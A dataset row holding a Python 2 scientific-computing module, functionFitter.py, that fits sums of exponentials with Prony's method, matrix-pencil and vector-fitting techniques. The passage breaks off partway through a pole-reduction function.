repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
WillemWybo/SGF_formalism | source/functionFitter.py | 1 | 43613 | """
Author: Willem Wybo
Date: 18/08/2015
Place: BBP, Geneva
"""
import numpy as np
import numpy.polynomial.polynomial as npol
import scipy.linalg as la
import scipy.optimize as op
import scipy.integrate as integ
import matplotlib.pyplot as pl
from scipy.cluster.vq import kmeans2
from scipy.cluster.vq import kmeans
import copy
import math
import warnings
import itertools
import types
class Fitter(object):
    """Base class bundling small numerical helpers shared by the fitters."""

    def der(self, x, arr):
        """First finite difference of `arr`; assumes `x` is uniformly spaced.

        Returns the difference quotients and the midpoints they live on.
        """
        step = x[1] - x[0]
        grad = np.diff(arr) / step
        return grad, x[:-1] + step / 2

    def derder(self, x, arr):
        """Second finite difference of `arr`; assumes `x` is uniformly spaced.

        Returns the second differences and the interior points they live on.
        """
        step = x[1] - x[0]
        grad, _ = self.der(x, arr)
        curv = np.diff(grad) / step
        return curv, x[1:-1]

    def zerocrossing(self, x, arr):
        """Indices (and x-values) just before each sign change of `arr`."""
        signs = np.sign(copy.copy(arr))
        inds = np.where(np.diff(signs))[0]
        return inds, x[inds]

    def find_nearest(self, array, value):
        """Element of `array` closest to `value`, together with its index."""
        idx = np.argmin(np.abs(array - value))
        return array[idx], idx
class ExpFitter(Fitter):
    '''Fit sums of (decaying) exponentials to regularly sampled data.'''

    def sumExp(self, x, a, c, flat=True):
        '''
        Evaluate sum_k c[k] * exp(a[k] * x) at the points x.

        input:
            [x]: numpy array of sample points
            [a]: numpy array of exponential coefficients
            [c]: numpy array of magnitudes
            [flat]: boolean, return a 1d array if True, a column if False
        output:
            numpy array with the real part of the evaluated sum
        '''
        if flat:
            return (np.exp(x[:,None]*a[:,None].T).dot(c[:,None])).flatten().real
        else:
            return np.exp(x[:,None]*a[:,None].T).dot(c[:,None]).real

    def PronyExpFit(self, deg, x, y):
        '''
        Construct a sum of exponentials fit to a given time-sequence y by
        using prony's method
        input:
            [deg]: int, number of exponentials
            [x]: numpy array, sequence of regularly spaced points at which y is evaluated
            [y]: numpy array, sequence
        output:
            [a]: numpy array, exponential coefficients
            [c]: numpy array, exponential magnitudes
            [rms]: float, root mean square error of the data
        '''
        # stepsize
        h = x[1] - x[0]
        # build the Hankel system whose solution gives the LP coefficients
        A = la.hankel(y[:-deg], y[-deg-1:])
        a = -A[:,:deg]
        b = A[:,deg]
        # solve it in a least-squares sense
        s = la.lstsq(a, b)[0]
        # the poles are the roots of the characteristic polynomial
        p = np.flipud(np.hstack((s, 1)))
        u = np.roots(p)
        # only keep roots in the unit circle (decaying terms) that are not
        # negative-real (those would alternate in sign per sample)
        inds = np.where(np.logical_and((np.abs(u) < 1.), \
                np.logical_not(np.logical_and(np.imag(u) == 0., np.real(u) <= 0.))))[0]
        u = u[inds]
        # exponential coefficients from the discrete poles
        a = np.log(u) / h
        # Vandermonde-like power matrix for the magnitudes
        A = np.power((np.ones((len(y),1))*u[:,None].T), np.arange(len(y))[:,None]*np.ones((1,len(inds))))
        f = la.lstsq(A, y)[0]
        # shift the amplitudes so they refer to x[0]
        c = f / np.exp(a*x[0])
        # evaluate the approximation and its rms error
        approx = self.sumExp(x, a, c).real
        rms = np.sqrt(((approx-y)**2).sum() / len(y))
        return a, c, rms

    def construct_Hankel_matrices(self, y):
        '''Return the Hankel matrix of y and its one-sample-shifted twin.'''
        ind0 = int(len(y)/2)
        # original and shifted hankel matrix
        H0 = la.hankel(y[0:ind0], y[ind0-1:2*ind0-1])
        H1 = la.hankel(y[1:ind0+1], y[ind0:2*ind0])
        return H0, H1

    def fitExp_Z_McE(self, x, y, rtol=1e-2, maxdeg=10):
        '''
        Matrix-pencil style exponential fit: the poles are eigenvalues of a
        reduced system matrix built from the SVD of the data's Hankel matrix.
        The degree is increased until [rtol] is reached or [maxdeg] is hit.

        input:
            [x]: numpy array, regularly spaced sample points
            [y]: numpy array, function values at x
            [rtol]: float, rms error at which to stop
            [maxdeg]: int, maximal number of exponentials
        output:
            [alphas], [gammas], [rms]: coefficients, magnitudes, rms error
        '''
        deg = 1; rms = 1.
        # stepsize
        dx = x[1] - x[0]
        # construct the Hankel matrices
        H0, H1 = self.construct_Hankel_matrices(y)
        # compute the singular value decomposition
        U, s, Vh = la.svd(H0)
        # loop over increasing number of exponentials
        while rms > rtol and deg < maxdeg:
            U_ = U[:, 0:deg]
            Vh_ = Vh[0:deg, :]
            s_ = s[0:deg]
            # compute the reduced system matrix
            F0 = np.diag(1./np.sqrt(s_)).dot(U_.T)
            F1 = Vh_.T.dot(np.diag(1./np.sqrt(s_)))
            A = F0.dot(H1.dot(F1))
            # find eigenvalues of system matrix
            u, v = la.eig(A)
            # system time-scales (inverse)
            # NOTE(review): log of a non-positive real eigenvalue yields nan
            alphas = np.log(u.real) / dx
            # solve the weights in a least-squares sense
            A = np.exp(x[:,None] * alphas[None, :] * dx)
            gammas = la.lstsq(A, y)[0]
            # compute rms error
            approx = self.sumExp(x, alphas, gammas)
            rms = np.sqrt(((approx-y)**2).sum() / len(y))
            # increase degree
            deg += 1
        return alphas, gammas, rms

    def reduceSeries(self, a, c, x, y, rtol=1e-2):
        '''
        Reduces the number of exponential terms in a series, till a given tolerance
        is reached
        input:
            [a]: numpy array of exponential timescales
            [c]: numpy array of exponential magnitudes
            [x]: numpy array of x-values at which the function is evaluated
            [y]: numpy array of function values
            [rtol]: float, relative tolerance given the largest function value
        output:
            [alpha]: exponential coefficients
            [gamma]: magnitudes
            [rms]: float, root mean square error
        '''
        k = 1; rms = 2*rtol
        # ranking by magnitude is loop-invariant; compute it once
        sortind = np.argsort(np.abs(c))[::-1]
        # keep adding the largest remaining term until the error is small
        while rms > rtol and k <= len(a):
            alpha = a[sortind][0:k]
            gamma = c[sortind][0:k]
            approx = self.sumExp(x, alpha, gamma).real
            rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
            k += 1
        return alpha, gamma, rms

    def fitExp(self, x, y, deg=30, rtol=1e-2, surface=False, A=None):
        '''
        Prony fit followed by a series reduction; optionally rescale the
        magnitudes so the fit conserves a given surface (integral).

        input:
            [x], [y]: numpy arrays, sample points and values
            [deg]: int, number of exponentials for the initial Prony fit
            [rtol]: float, relative tolerance for the series reduction
            [surface]: boolean, rescale magnitudes to conserve the surface
            [A]: float or None, target surface; computed from y when None
        output:
            [alpha], [gamma], [rms]: coefficients, magnitudes, rms error
        '''
        a, c, rms = self.PronyExpFit(deg, x, y)
        alpha, gamma, rms = self.reduceSeries(a, c, x, y, rtol=rtol)
        if surface:
            dx = x[1] - x[0]
            # bugfix: use an identity test; `A == None` broadcasts when A is
            # a numpy array and is invalid as a truth value
            if A is None:
                A = dx * np.sum(y)
            Afit = np.sum(gamma * (np.exp(alpha*x[-1]) - np.exp(alpha*x[0])) / alpha)
            gamma = gamma * A / Afit
        approx = self.sumExp(x, alpha, gamma).real
        rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
        return alpha, gamma, rms
class fExpFitter(Fitter):
    '''Fit functions in the Fourier domain with sums of Fourier-transformed
    exponentials of the form gamma / (alpha + s).'''

    def sumFExp(self, s, alphas, gammas):
        '''Evaluate the summed rational approximation at the frequencies s.'''
        terms = self.fexps(s, alphas, gammas)
        return terms.sum(axis=0)

    def fexps(self, s, alphas, gammas):
        '''Return one row per term: gammas[k] / (alphas[k] + s).'''
        return np.divide(gammas[:, None], np.add.outer(alphas, s))
def trialFunFit(self, s, arr, alphas, pairs=None):
    '''One unconstrained vector-fitting iteration: relocate the trial poles
    and refit the residues.

    input:
        [s]: complex numpy array of frequencies
        [arr]: complex numpy array of function values at s
        [alphas]: numpy array of current trial poles
        [pairs]: unused, kept for interface symmetry with the constrained fit
    output:
        relocated poles, their residues, and None (no pair bookkeeping)
    '''
    deg = len(alphas)
    # extended system: pole terms followed by the same terms weighted by arr
    basis = 1. / (s[:, None] + alphas[None, :])
    A = np.concatenate((basis, arr[:, None] * basis), axis=1)
    # auxiliary (sigma) residues are the trailing unknowns
    caux = la.lstsq(A, arr)[0][-deg:]
    # zeros of sigma = eigenvalues of the pole matrix minus a rank-one update
    H = np.diag(alphas) - np.dot(np.ones((deg, 1), dtype=complex), caux[None, :])
    alphanew = np.linalg.eig(H)[0]
    # refit the residues with the relocated poles held fixed
    cnew = la.lstsq(1. / (s[:, None] + alphanew[None, :]), arr)[0]
    return alphanew, cnew, None
def trialFunFit_constrained(self, s, arr, alphas, pairs, zerostart=False):
    '''
    One vector-fitting iteration in which complex poles are constrained to
    occur in conjugate pairs, so that the time-domain kernel stays real.

    input:
        [s]: complex numpy array of frequencies at which arr is sampled
        [arr]: complex numpy array of function values
        [alphas]: numpy array, current trial poles
        [pairs]: boolean array, True at the first member of each conjugate pair
        [zerostart]: boolean, if True append a row enforcing K(t=0) = 0
    output:
        [alphanew]: relocated poles
        [cnew]: complex residues for the relocated poles
        [pairs]: updated conjugate-pair indicator for alphanew
    '''
    deg = len(alphas)
    # solve in the real domain: stack real and imaginary parts of the data
    carr = np.concatenate((arr.real, arr.imag))
    # construct matrix for extended fitting problem: pole terms followed by
    # the same terms weighted by arr (the auxiliary sigma function)
    A = np.concatenate((1. / (s[:,None] + alphas[None,:]), \
                        arr[:,None] / (s[:,None] + alphas[None,:])), axis=1)
    # implement the constraint: replace each pair of columns by their sum
    # and 1j*difference so the unknowns become real and imaginary parts
    pairsnew = np.concatenate((pairs, pairs))
    for i, p in enumerate(pairsnew):
        if p:
            x1 = A[:,i] + A[:,i+1]
            x2 = 1j * (A[:,i] - A[:,i+1])
            A[:,i] = x1
            A[:,i+1] = x2
    A = np.concatenate((A.real, A.imag), axis=0)
    # find auxiliary residues (the trailing deg unknowns)
    c = la.lstsq(A, carr)[0][-len(alphas):]
    # find zeros of fitted auxiliary function: eigenvalues of the pole
    # matrix minus a rank-one update
    a = np.diag(alphas)
    b = np.ones(deg)
    # implement similarity transform that keeps the matrix real for pairs
    for i, p in enumerate(pairs):
        if p:
            a[i:i+2, i:i+2] = np.array([[alphas[i].real, alphas[i].imag], \
                                        [-alphas[i].imag, alphas[i].real]])
            b[i:i+2] = np.array([2,0])
    H = a.real - np.dot(b[:,None], c[None,:])
    alphanew = np.linalg.eig(H)[0]
    inds = np.argsort(alphanew)
    alphanew = alphanew[inds]
    # indicates where pairs of complex conjugate poles occur: nearly equal
    # consecutive magnitudes combined with a nonzero imaginary part
    auxarr = np.abs((np.abs(alphanew[:-1]) - np.abs(alphanew[1:])) / np.abs(alphanew[:-1]))
    # NOTE(review): this tests the imaginary parts of the *old* poles while
    # auxarr is built from the relocated ones; the 2d variant of this routine
    # uses alphanew.imag here instead -- confirm which is intended
    auxarr2 = np.abs(alphas.imag) > 1e-15
    pairs = np.logical_and(np.concatenate((auxarr < 1e-15, np.zeros(1, dtype=bool))), auxarr2)
    # find residues for the relocated poles (same pair transform as above)
    Anew = 1. / (s[:,None] + alphanew[None,:])
    for i, p in enumerate(pairs):
        if p:
            x1 = Anew[:,i] + Anew[:,i+1]
            x2 = 1j * (Anew[:,i] - Anew[:,i+1])
            Anew[:,i] = x1
            Anew[:,i+1] = x2
    Anew = np.concatenate((Anew.real, Anew.imag), axis=0)
    if zerostart:
        # enforce K(t=0)=0 constraint by prepending a surface row
        # NOTE(review): row1 is computed but never used, and the prepended
        # row of ones ignores the pair transform -- verify this constraint
        # is correct for complex conjugate pairs
        row1 = np.ones(2*deg)
        for i, p in enumerate(pairs):
            if p:
                row1[i+1] = 0
        Anew = np.concatenate((np.ones((1, deg), dtype=complex), Anew), axis=0)
        carr = np.concatenate((np.zeros(1, dtype=complex), carr))
    cnew = la.lstsq(Anew, carr)[0]
    cnew = np.array(cnew, dtype=complex)
    # recast cnew to complex values: for a pair the solved unknowns are the
    # (real, imaginary) parts of the residue
    for i, p in enumerate(pairs):
        if p:
            cnew[i:i+2] = np.array([cnew[i] + 1j * cnew[i+1], cnew[i] - 1j * cnew[i+1]])
    return alphanew, cnew, pairs
def fit_residues(self, s, arr, alphas, pairs):
    '''Least-squares fit of the residues for a fixed set of poles.

    input:
        [s]: complex numpy array of frequencies
        [arr]: complex numpy array of function values at s
        [alphas]: numpy array of (fixed) poles
        [pairs]: boolean array marking the first member of conjugate pairs
    output:
        complex numpy array of residues
    '''
    # solve in the real domain: stack real and imaginary parts
    target = np.concatenate((arr.real, arr.imag))
    A = 1. / (s[:, None] + alphas[None, :])
    # for conjugate pairs, switch the column pair to (sum, 1j*difference)
    # so the unknowns become the residue's real and imaginary parts
    for i, p in enumerate(pairs):
        if p:
            col_sum = A[:, i] + A[:, i+1]
            col_dif = 1j * (A[:, i] - A[:, i+1])
            A[:, i] = col_sum
            A[:, i+1] = col_dif
    A = np.concatenate((A.real, A.imag), axis=0)
    res = np.array(la.lstsq(A, target)[0], dtype=complex)
    # rebuild the complex conjugate residues from the real solution
    for i, p in enumerate(pairs):
        if p:
            res[i:i+2] = np.array([res[i] + 1j * res[i+1], res[i] - 1j * res[i+1]])
    return res
def trialFunFit_constrained_2d(self, s, arr2d, alphas, pairs):
    '''
    One constrained vector-fitting iteration for several data arrays at
    once: the pole set is shared, the residues are fitted per array.

    input:
        [s]: complex numpy array of frequencies
        [arr2d]: 2d complex numpy array, one data array per row
        [alphas]: numpy array, current shared trial poles
        [pairs]: boolean array marking complex conjugate pole pairs
    output:
        [alphanew]: relocated shared poles
        [c2dnew]: 2d complex array of residues, one row per data array
        [pairs]: updated conjugate-pair indicator
    '''
    print '>>> multifun fit test v2 <<<'
    deg = len(alphas)
    # construct f array: all data arrays concatenated into one long vector
    arr1d = np.array([], dtype=complex)
    for ind, arr in enumerate(arr2d):
        arr1d = np.concatenate((arr1d, arr))
    # construct matrix A: a block-diagonal pole block per data array plus a
    # shared trailing block for the auxiliary (sigma) unknowns
    ns = len(s)
    ncols = (len(arr2d) + 1) * deg
    nrows = len(arr1d)
    A = np.zeros((nrows, ncols), dtype=complex)
    for ind, fis in enumerate(arr1d):
        indA = int(ind/ns)  # which data array this row belongs to
        A[ind,deg*indA:deg*(indA+1)] = 1./(s[ind%ns] + alphas)
        # try:
        #     A[ind,deg*indA:deg*(indA+1)] = 1./(s[ind%ns] + alphas)
        # except ValueError:
        #     print indA
        #     print deg*indA
        #     print deg*(indA+1)
        #     print ncols
        A[ind,-deg:] = -fis / (s[ind%ns] + alphas)
    # implement the conjugate-pair constraint on every column block
    for j in range(len(arr2d) + 1):
        for i, p in enumerate(pairs):
            if p:
                x1 = A[:,j*deg+i] + A[:,j*deg+i+1]
                x2 = 1j * (A[:,j*deg+i] - A[:,j*deg+i+1])
                A[:,j*deg+i] = x1
                A[:,j*deg+i+1] = x2
    # solve in the real domain
    A = np.concatenate((A.real, A.imag), axis=0)
    arr1d = np.concatenate((arr1d.real, arr1d.imag))
    # find auxiliary residues
    c = la.lstsq(A, arr1d)[0][-len(alphas):]
    print 'cnew: ', c
    # find zeros of fitted auxiliary function
    a = np.diag(alphas)
    b = np.ones(deg)
    # implement similarity transform that keeps the pole matrix real
    for i, p in enumerate(pairs):
        if p:
            a[i:i+2, i:i+2] = np.array([[alphas[i].real, alphas[i].imag], \
                                        [-alphas[i].imag, alphas[i].real]])
            b[i:i+2] = np.array([2,0])
    # compute zeros of sum sigmafit as eigenvalues of a rank-one update
    H = a.real - np.dot(b[:,None], c[None,:])
    print 'H: ', H
    alphanew = np.linalg.eig(H)[0]
    print 'alphanew: ', alphanew
    inds = np.argsort(alphanew)
    alphanew = alphanew[inds]
    # indicates where pairs of complex conjugate poles occur
    auxarr = np.abs((np.abs(alphanew[:-1]) - np.abs(alphanew[1:])) / np.abs(alphanew[:-1]))
    auxarr2 = np.abs(alphanew.imag) > 1e-15 # np.abs(alphas.imag) > 1e-15
    pairs = np.logical_and(np.concatenate((auxarr < 1e-15, np.zeros(1, dtype=bool))), auxarr2)
    # find residues
    # compute matrix for residue calculation (same pair transform as above)
    Anew = 1. / (s[:,None] + alphanew[None,:])
    for i, p in enumerate(pairs):
        if p:
            x1 = Anew[:,i] + Anew[:,i+1]
            x2 = 1j * (Anew[:,i] - Anew[:,i+1])
            Anew[:,i] = x1
            Anew[:,i+1] = x2
    Anew = np.concatenate((Anew.real, Anew.imag), axis=0)
    # compute residues, one least-squares solve per data array
    c2dnew = np.zeros((arr2d.shape[0], deg), dtype=complex)
    for ind, arr in enumerate(arr2d):
        carr = np.concatenate((arr.real, arr.imag))
        cnew = la.lstsq(Anew, carr)[0]
        cnew = np.array(cnew, dtype=complex)
        # recast cnew to complex values (pair unknowns are real/imag parts)
        for i, p in enumerate(pairs):
            if p:
                cnew[i:i+2] = np.array([cnew[i] + 1j * cnew[i+1], cnew[i] - 1j * cnew[i+1]])
        c2dnew[ind,:] = cnew
    print 'cnew: ', c2dnew
    return alphanew, c2dnew, pairs
def reduceSeries(self, s, y, a, c, pairs=None, rtol=1e-2, pprint=True):
    '''
    reduce the series of exponentials after the fitting: drop unstable
    poles, rank the terms by the surface they contribute to the kernel,
    and keep the smallest prefix that reaches the requested tolerance.

    input:
        [s]: complex numpy array of frequencies
        [y]: complex numpy array of function values at s
        [a], [c]: pole and residue arrays of the current fit
        [pairs]: boolean array marking conjugate pole pairs (or None)
        [rtol]: float, relative tolerance at which to stop adding terms
        [pprint]: boolean, print diagnostics when invalid pairs are detected
    output:
        [alphas], [gammas]: reduced pole and residue arrays
        [rms]: float, relative root mean square error of the reduced fit
        [approx]: numpy array, reduced approximation at s
        [npairs]: pair indicator for the reduced arrays
    '''
    k = 1; rms = 1.
    # ensure stability of approximation: keep poles with positive real part
    inds = np.where(a.real > 0.)[0]
    a = a[inds]; c = c[inds];
    # NOTE(review): `pairs != None` compares a numpy array elementwise on
    # modern numpy; `pairs is not None` is presumably intended -- confirm
    if pairs != None: pairs = pairs[inds]
    # construct indices for ranking the exponentials: mark both members of
    # every conjugate pair
    pairs_alltrue = copy.copy(pairs)
    for i,p in enumerate(pairs):
        if p: pairs_alltrue[i+1] = True
    # the magnitude of a term is its surface contribution c/a
    magnitudes = np.zeros(a.shape)
    for i in range(len(pairs_alltrue)):
        if pairs_alltrue[i]:
            # NOTE(review): c__ and a__ duplicate c_ and a_, so this formula
            # collapses to c_/a_; the second member of the pair (index i+1)
            # was possibly meant here -- confirm
            c_ = c[i].real; c__ = c[i].real
            a_ = a[i].real; a__ = a[i].real
            magnitudes[i] = (c_*a_ + c__*a__) / (a_**2 + a__**2)
        else:
            magnitudes[i] = c[i].real / a[i].real
    sortind = np.argsort(np.abs(magnitudes))[::-1]
    anew = copy.copy(a[sortind])
    alphas = anew
    cnew = copy.copy(c[sortind])
    gammas = cnew
    # look for pairs to be sure they are correct after the reordering
    auxarr = np.abs((np.abs(alphas[:-1]) - np.abs(alphas[1:])) / np.abs(alphas[:-1]))
    auxarr2 = np.abs(alphas.imag) > 1e-15
    pairs = np.logical_and(np.concatenate((auxarr < 1e-15, np.zeros(1, dtype=bool))), auxarr2)
    npairs = copy.copy(pairs)
    approx = self.sumFExp(s, alphas, gammas)
    # keep adding terms (pairs as a unit) until the tolerance is reached
    while rms > rtol and k < len(a)+1:
        if (pairs != None) and pairs[k-1]:
            k += 1
        alphas = anew[0:k]
        gammas = cnew[0:k]
        auxarr = np.abs((np.abs(alphas[:-1]) - np.abs(alphas[1:])) / np.abs(alphas[:-1]))
        auxarr2 = np.abs(alphas.imag) > 1e-15
        npairs = np.logical_and(np.concatenate((auxarr < 1e-15, np.zeros(1, dtype=bool))), auxarr2)
        approx = self.sumFExp(s, alphas, gammas)
        rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
        k += 1
    if pprint:
        # sanity check: every retained complex pole should be part of a pair
        pairinds = copy.copy(npairs)
        inds = np.where(npairs)[0]
        for i in inds:
            pairinds[i+1] = True
        inds = np.where(np.logical_not(pairinds))[0]
        if len(inds) > 0:
            if np.max(np.abs(alphas[inds].imag)) > 1e-6:
                print '!!! Warning: invalid pairs !!!'
                print 'original alphas: ', anew
                print 'original gammas: ', cnew
                print 'original pairs: ', pairs
                print 'new alphas: ', alphas
                print 'new gammas: ', gammas
                print 'new pairs: ', npairs
    return alphas, gammas, rms, approx, npairs
def _find_start_nodes(self, s, deg, realpoles, initpoles):
    '''Generate the initial trial poles for the vector fit.

    input:
        [s]: complex numpy array of frequencies (imaginary axis)
        [deg]: int, number of poles (doubled when realpoles is False)
        [realpoles]: boolean, real poles if True, conjugate pairs if False
        [initpoles]: 'lin', 'log10', 'log' or 'random' pole spacing
    output:
        [trialpoles]: numpy array of initial poles
        [pairs]: boolean array marking the first member of each pair
    '''
    smax = s[-1].imag
    if initpoles == 'lin':
        trialpoles = np.linspace(s[int(len(s)/2.)+1].imag, smax, deg)
    elif initpoles == 'log10':
        trialpoles = np.logspace(1, np.log10(smax), num=deg, base=10)
    elif initpoles == 'log':
        trialpoles = np.logspace(1, np.log(smax), num=deg, base=math.e)
    elif initpoles == 'random':
        trialpoles = smax * np.random.rand(deg)
    else:
        raise Exception('initpoles invalid')
    if realpoles:
        pairs = np.zeros(trialpoles.shape, dtype=bool)
    else:
        # expand every pole p into the conjugate pair p*(1+1j), p*(1-1j)
        trialpoles = (trialpoles[:, None] * np.array([1. + 1j, 1. - 1j])).flatten()
        pairs = np.tile(np.array([True, False]), deg)
    return trialpoles, pairs
def _run_fit(self, s, y, trialpoles, pairs, rtol, maxiter, constrained, zerostart, pole_flip=True, pprint=True):
'''
performs iterations of the actual fitting process
'''
k = 0; rms = rtol+1.
l = 0; m = 0
alist = []; clist = []; rmslist = []; pairslist = []
trialpoles_orig = copy.copy(trialpoles)
pairs_orig = copy.copy(pairs)
if constrained:
while rms > rtol and k < maxiter:
a, c, pairs = self.trialFunFit_constrained(s, y, trialpoles, pairs, zerostart=zerostart)
approx = self.sumFExp(s, a, c)
rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
# if unstable poles, make sure to run again
# if np.min(a) < 0.:
# rms = rtol + 1.
# if m < 10.:
# if pole_flip:
ind = np.where(a < 0.)[0] # where poles are unstable
if len(ind) > 0:
a[ind] *= -1.
c = self.fit_residues(s, y, a, pairs)
approx = self.sumFExp(s, a, c)
rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
# if rms < rtol:
# alist.append(copy.deepcopy(a)); clist.append(copy.deepcopy(c)); rmslist.append(rms); pairslist.append(pairs)
# else:
# ind = np.where(a > 0.)[0] # where poles are stable
# newpole, newpair = self._find_start_nodes(s, len(a)-len(ind), True, 'random')
# trialpoles = np.concatenate((a[ind], newpole))
# pairs = np.concatenate((pairs[ind], newpair))
# else:
# trialpoles, pairs = self._find_start_nodes(s, len(trialpoles_orig), True, 'random')
# m = 0
# l += 1; m += 1
# else:
alist.append(copy.deepcopy(a)); clist.append(copy.deepcopy(c)); rmslist.append(rms); pairslist.append(pairs)
trialpoles = copy.copy(a)
k += 1
if pprint and l > 5:
print 'Often found unstable poles (' + str(l) + ' times)'
return alist, clist, rmslist, pairslist
else:
while rms > rtol and k < maxiter:
a, c,_ = self.trialFunFit(s, y, trialpoles, zerostart)
approx = self.sumFExp(s, a, c)
rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
trialpoles = a
k += 1
return alist, clist, rmslist, None
def _run_fit_vector(self, s, ys, trialpoles, pairs, rtol, maxiter):
    '''
    Performs iterations of the vector-fitting process for multiple data
    arrays that share one common pole set.

    input:
        [s]: complex numpy array of frequencies
        [ys]: 2d complex numpy array, one data array per row
        [trialpoles]: numpy array of initial poles
        [pairs]: boolean array marking complex conjugate pole pairs
        [rtol]: float, aggregated relative error at which to stop
        [maxiter]: int, maximal number of iterations
    output:
        per-iteration lists of shared pole arrays, 2d residue arrays,
        aggregated rms errors and pair arrays
    '''
    eps = 2.
    k = 0; rms = 1.
    rms_ = rms  # previous iteration's error, for the stall test below
    alist = []; clist = []; rmslist = []; pairslist = []
    while rms > rtol and k < maxiter:
        # fit every data array separately with the current trial poles
        a2d = np.zeros((len(ys), len(trialpoles)), dtype=complex)
        c2d = np.zeros((len(ys), len(trialpoles)), dtype=complex)
        pairs2d = np.zeros((len(ys), len(trialpoles)), dtype=bool)
        for ind, y in enumerate(ys):
            a2d[ind], c2d[ind], pairs2d[ind] = self.trialFunFit_constrained(s, y, trialpoles, pairs)
            # put complex conjugates with positive part first (explicit
            # .real: ordering is undefined for complex values; presumably
            # the real part was intended -- confirm)
            for i, p in enumerate(pairs2d[ind]):
                if p:
                    if a2d[ind,i].real < 0:
                        a2d[ind,i] = a2d[ind,i].real - 1j * a2d[ind,i].imag
                        a2d[ind,i+1] = a2d[ind,i+1].real - 1j * a2d[ind,i+1].imag
                        c2d[ind,i] = c2d[ind,i].real - 1j * c2d[ind,i].imag
                        c2d[ind,i+1] = c2d[ind,i+1].real - 1j * c2d[ind,i+1].imag
        # cluster the per-array pole sets into one shared pole set
        a, pairs = self._Kmeans(a2d, pairs2d)
        # refit the residues with the shared poles held fixed
        c2d = np.zeros((len(ys), len(a)), dtype=complex)
        # bugfix: reset the aggregated error each iteration; it previously
        # started at 1. and accumulated across iterations
        rms = 0.
        for ind, y in enumerate(ys):
            c2d[ind] = self.fit_residues(s, y, a, pairs)
            approx = self.sumFExp(s, a, c2d[ind])
            rms += np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
        alist.append(copy.deepcopy(a)); clist.append(copy.deepcopy(c2d)); rmslist.append(rms); pairslist.append(pairs)
        # randomize poles a bit when convergence stalls
        skip = False
        tp = copy.deepcopy(a)
        if (rms_ - rms) / rms_ < eps:
            for i, p in enumerate(pairs):
                if not skip:
                    if p:
                        x1 = 0.1 * tp[i].real; x2 = 0.1 * np.abs(tp[i].imag)
                        r1 = x1 * (2. * np.random.rand() - 1); r2 = x2 * (2. * np.random.rand() - 1)
                        tp[i:i+2] = np.array([tp[i] + r1 + 1j*r2, tp[i+1] + r1 - 1j*r2])
                        skip = True
                    else:
                        x = 0.1 * tp[i]
                        r = x * (2. * np.random.rand() - 1)
                        tp[i] += r
                        skip = False
                else:
                    # bugfix: skip was never reset after the second member
                    # of a pair, so every pole after the first pair was
                    # silently left unperturbed
                    skip = False
        trialpoles = tp
        k += 1
        # bugfix: remember this iteration's error for the stall test
        # (rms_ previously stayed at its initial value forever)
        rms_ = rms
    return alist, clist, rmslist, pairslist
def _Kmeans(self, a2d, pairs2d): # do the kmeans algorithm to make sure all nodes are the same
    '''
    Cluster the per-dataset pole sets into one shared pole set by running
    k-means in the (real, imag) plane, then rebuild conjugate pairs from
    the resulting centroids.

    input:
        [a2d]: 2d complex numpy array, one pole set per row
        [pairs2d]: 2d boolean array, pair indicators per row
    output:
        shared complex pole array and its pair indicator array
    '''
    a1d = np.array([], dtype=complex)
    for i, a in enumerate(a2d):
        # determine the coefficients not to take into account in the
        # algorithm (the second member of each conjugate pair is redundant)
        paux = np.concatenate((np.array([False]), pairs2d[i,:-1]))
        inds = np.where(np.logical_not(paux))[0]
        a1d = np.concatenate((a1d,a[inds]))
    # cluster in the (real, imag) plane
    adata = np.concatenate((a1d.real[:,None], a1d.imag[:,None]), 1)
    # NOTE(review): `inds` here is left over from the last loop iteration
    # above, which corresponds to a2d[-1] -- consistent as written, but
    # fragile if the loop is ever changed
    astart = np.concatenate((a2d[-1].real[inds][:,None], a2d[-1].imag[inds][:,None]), 1)
    a = kmeans(adata, astart)[0]
    # check for complex conjugates: centroids with a nonzero imaginary part
    # are expanded back into conjugate pairs
    anew = []; pairsnew = []
    for alpha in a:
        if np.abs(alpha[1]) > 1e-9:
            anew.append(alpha[0] + 1j*alpha[1])
            anew.append(alpha[0] - 1j*alpha[1])
            pairsnew.append(True)
            pairsnew.append(False)
        else:
            anew.append(alpha[0] + 1j*0.)
            pairsnew.append(False)
    # a = a[:,0] + 1j* a[:,1]
    # look for pairs to be sure they are correct
    # auxarr = np.abs((np.abs(a[:-1]) - np.abs(a[1:])) / np.abs(a[:-1]))
    # auxarr2 = np.abs(a.imag) > 1e-15
    # pairs = np.logical_and(np.concatenate((auxarr < 1e-15, np.zeros(1, dtype=bool))), auxarr2)
    return np.array(anew), np.array(pairsnew)
def reduceNumExp(self, s, y, a, c, pairs, lim=0.1, pprint=True, pplot=True):
    '''
    pools the short timescale exponentials: terms with |Re(a)| > 1e3/lim
    are replaced by one or two surrogate exponentials chosen so that the
    surface (time-domain integral) of the kernel is conserved.

    input:
        [s]: complex numpy array of frequencies
        [y]: complex numpy array of function values at s
        [a], [c]: pole and residue arrays of the current fit
        [pairs]: boolean array marking complex conjugate pole pairs
        [lim]: float, smallest timescale to keep [ms]
        [pprint]: boolean, print diagnostics when surfaces don't match
        [pplot]: boolean, show diagnostic plots on problems
    output:
        [anew], [cnew]: reduced pole and residue arrays
        [rms]: float, relative rms error of the reduced approximation
        [approx]: numpy array, reduced approximation at s
        [pairsnew]: pair indicator for the reduced arrays
    '''
    # find inds of exponentials that have to be taken together
    inds = np.where(np.abs(a.real) > (1e3 / lim))[0]
    # the other indices stay the same
    # NOTE(review): when exactly one short-timescale term exists
    # (len(inds) == 1) it is dropped without a surrogate -- confirm intended
    inds_no = np.where(np.abs(a.real) <= (1e3 / lim))[0]
    anew = a[inds_no]; cnew = c[inds_no]; pairsnew = pairs[inds_no]
    if len(inds) > 1:
        amin = np.min(a[inds])
        EF = ExpFitter()
        if pplot == True:
            import matplotlib.pyplot as pl
            y_f_full = self.sumFExp(s, a, c)
